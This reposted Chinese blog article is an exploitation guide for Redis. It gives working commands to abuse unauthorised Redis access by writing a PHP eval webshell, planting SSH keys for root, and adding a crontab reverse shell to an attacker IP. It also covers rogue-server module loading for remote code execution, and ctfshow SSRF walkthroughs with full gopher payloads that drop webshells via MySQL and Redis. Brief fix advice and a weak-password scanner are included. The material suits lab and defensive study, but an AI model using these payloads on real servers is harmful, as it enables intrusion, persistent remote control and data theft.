当前位置：首页 > news >正文

【Redis漏洞利用总结】

news 文章来源：https://blog.csdn.net/weixin_46356409/article/details/135757806 2025/5/4 4:54:24

前言

redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。Redis默认使用 6379 端口。

一、redis未授权访问漏洞

0x01 漏洞描述

描述: Redis是一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库，并提供多种语言的API。 Redis默认情况下会绑定在0.0.0.0:6379，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法，可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys文件中，进而可以直接登录目标服务器。

0x02 影响范围

Redis <= 5.0.5

0x03 环境搭建

第一种 redis各个版本下载

wget http://download.redis.io/releases/redis-2.8.17.tar.gz
解压  tar -zxvf redis-2.8.17.tar.gz
cd redis-2.8.17/
make
cd src
./redis-cli -h

第二种直接docker启用

0x03 漏洞利用

探测漏洞

nmap -sV -p 6379 -script redis-info 192.168.1.1

未授权登录

上边nmap探测出6379对外网开放允许所有地址访问直接用linux redis客户端连接

redis-cli -h 192.168.67.4

redis操作命令

info  #查看redis的信息和服务器信息
flushall 删除所有数据
del key  删除键为key的数据
get key  获得参数key的数据

3.1 利用redis写webshell

利用前提

1、目标机redis连接未授权 redis-cli -h 目标ip 连接成功 keys * 未启用认证 2、开启web服务知道网站路径如利用phpinfo 得知或错误爆破路径得知还需具有文件增删查改权限

利用方法

连接成功后输入以下指令

config set dir /var/www/html
config set dbfilename redis.php
set webshell "<?php eval($_POST[1]); ?>"
或者
set x "\r\n\r\n<?php eval($_POST[1]); ?>\r\n\r\n"
save

连接成功

当数据库过大时，redis写shell的小技巧：

exit(); ?>

3.2 利用“公私钥” 认证获取root权限

当redis以root身份运行，可以给root账户写入ssh公钥权限，直接通过ssh登录服务器。靶机中开启redis服务 redis-server /etc/redis.conf 在靶机中执行 mkdir /root/.ssh命令创建ssh公钥存放目录（靶机是作为ssh服务器使用的）

利用方法

在攻击机中申生成ssh公钥和私钥，密码设为空

ssh-keygen -t rsa
进入.ssh目录:cd .ssh/ 将生成的公钥保存到1.txt
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt
cat 1.txt | redis-cli -h 192.168.157.129 -x set crack
redis-cli -h 192.168.157.129
config set dir /root/.ssh       #	更改redis备份路径为ssh公钥存放目录（一般为/root/.ssh）
config set dbfilename authorized_keys  #设置上传公钥的备份文件名字为authorized_key s
config get dbfilename #检查是否更改成功 
save      #保存 
exit       #退出
ssh -i id_rsa root@192.168.157.129   #在攻击机上使用ssh免密登录靶机

连接成功

3.3 利用crontab反弹shell

在权限足够的情况下，利用redis写入文件到计划任务目录下执行

利用方法

端口监听在攻击者服务器上监听一个端口（未被占用的任意端口）

nc -lvnp 9897

攻击详情

连接redis，写入反弹shell

redis-cli -h 192.168.157.129
config set dir /var/spool/cron
config set dbfilename root
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.157.137/9897 0>&1\n\n"
save

在靶机上看到写入成功过一分钟左右可以收到shell

0x04 漏洞修复

1、禁止公网访问redis服务端口 2、禁止使用root权限启动redis服务 3、配置安全组，限制可连接redis服务器的ip。 4、redis.conf中修改配置把 #bind 127.0.0.1前面的注释#号去掉，然后把127.0.0.1改成你允许访问你的redis服务器的ip地址，表示只允许该ip进行访问，这种情况下，我们在启动redis服务器的时候不能再用:redis-server，改为:redis-server path/redis.conf 即在启动的时候指定需要加载的配置文件,其中path/是你上面修改的redis配置文件所在目录，这个方法有一点不太好，我难免有多台机器访问一个redis服务。 5、设置密码redis.conf requirepass 修改如下 requirepass yourpassword yourpassword就是redis验证密码，设置密码以后发现可以登陆，但是无法执行命令了。命令如下: redis-cli -h yourIp -p yourPort//启动redis客户端，并连接服务器 keys * //输出服务器中的所有key 报错如下 (error) ERR operation not permitted

这时候你可以用授权命令进行授权，就不报错了

命令如下: auth youpassword

测试是否存在未授权或弱口令的脚本

或者直接用nmap -script redis-info

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):try:socket.setdefaulttimeout(timeout)s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((ip, int(port)))s.send("INFO\r\n")result = s.recv(1024)if "redis_version" in result:return u"存在未授权访问"elif "Authentication" in result:for pass_ in PASSWORD_DIC:s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((ip, int(port)))s.send("AUTH %s\r\n" %(pass_))result = s.recv(1024)if '+OK' in result:return u"存在弱口令，密码：%s" % (pass_)except Exception as e:pass
if __name__ == '__main__':ip=sys.argv[1]port=sys.argv[2]print check(ip,port, timeout=10)

二、redis 远程命令执行漏洞 (CNVD-2019-21763)

0x01 漏洞描述

Redis未授权访问在4.x/5.0.5以前版本下，我们可以使用master/slave模式加载远程模块，通过动态链接库的方式执行任意命令。

描述: Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。由于在Reids 4.x及以上版本中新增了模块功能，攻击者可通过外部拓展，在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块，在未授权访问的情况下使被攻击服务器加载恶意.so 文件，从而实现远程代码执行。

0x02 影响范围

Redis 2.x，3.x，4.x，5.x

0x03 漏洞利用

使用如下POC即可直接执行命令 https://github.com/vulhub/redis-rogue-getshell：

nc -lvvp 9897python3 redis-rogue-server.py --rhost 118.193.36.37 --rport 33971 --lhost 119.29.67.4 --lport 8080
r          #反弹shell  r       直接交互i 
ip         # 反弹ip
9897        #监听端口

0x04 漏洞修复

1、禁止外部访问Redis 服务端口；

2、禁止使用root权限启动Redis服务；

3、配置安全组，限制可连接Redis服务器的IP。

三、SSRF攻击内网五密码mysql

0x01 靶场环境

ctfshow359关

0x02解题

1. 随意输入用户名密码，点击login后发现请求包含有returl

改成dnslog地址后，dnslog地址收到请求说明服务器请求了dns地址

2.看看有无回显(有回显)

改为http://127.0.0.1 说明有回显

3. 探测其他端口

靶场已经说了是mysql 无密码就不探测内网了，直接测本机的端口了

先用dict 协议响应时间都没有变，可能不支持dict协议在用gopher协议gopher://127.0.0.1:3306 根据响应时间得知开放了 3306端口和80端口并发数设置为1

4. gopher协议通过mysql写入webshell

工具

https://github.com/tarunkant/Gopherus.git 写入 select ‘<?php @eval($_REQUEST[0]); ?>’ into outfile ‘/var/www/html/4.php’;

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4b%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%52%45%51%55%45%53%54%5b%30%5d%29%3b%20%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%34%2e%70%68%70%27%3b%01%00%00%00%01

_后面要进行url编码，因为curl还会进行一次url解码

gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254b%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2552%2545%2551%2555%2545%2553%2554%255b%2530%255d%2529%253b%2520%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2534%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501

getshell成功

四、 ssrf攻击内网redis gopher协议

0x01 靶场环境

ctfshow 360

0x02 解题

1. post url请求

根据代码提示 post url 请求 curl_exec 也是存在ssrf漏洞

2. 探测回显

也是全回显也出网

3. 探测其他端口

这里dict 协议探测时间不会变 gopher可以 url=gopher://127.0.0.1:3306 开放 80 3306 6379端口不过url=dict://127.0.0.1:6379/info 这样 dict协议也能用

4. gohper 攻击6379端口

python2 gopherus.py --exploit redis phpshell

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

一样将 后边的url编码 gopher://127.0.0.1:6379/%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255B%2527cmd%2527%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

这里虽然返回504 但是已经写入成功了

前言

一、redis未授权访问漏洞

0x01 漏洞描述

0x02 影响范围

0x03 环境搭建

0x03 漏洞利用

探测漏洞

未授权登录

3.1 利用redis写webshell

利用前提

利用方法

3.2 利用“公私钥” 认证获取root权限

利用方法

3.3 利用crontab反弹shell

利用方法

0x04 漏洞修复

测试是否存在未授权或弱口令的脚本

二 、redis 远程命令执行漏洞 (CNVD-2019-21763)

0x01 漏洞描述

0x02 影响范围

0x03 漏洞利用

0x04 漏洞修复

三 、SSRF攻击内网五密码mysql

0x01 靶场环境

0x02解题

1. 随意输入用户名密码，点击login后 发现 请求包含有returl

2.看看有无回显(有回显)

3. 探测其他端口

4. gopher协议通过mysql写入webshell

工具

四、 ssrf攻击内网redis gopher协议

0x01 靶场环境

0x02 解题

1. post url请求

2. 探测回显

3. 探测其他端口

4. gohper 攻击6379端口

相关文章：

二、redis 远程命令执行漏洞 (CNVD-2019-21763)

三、SSRF攻击内网五密码mysql

1. 随意输入用户名密码，点击login后发现请求包含有returl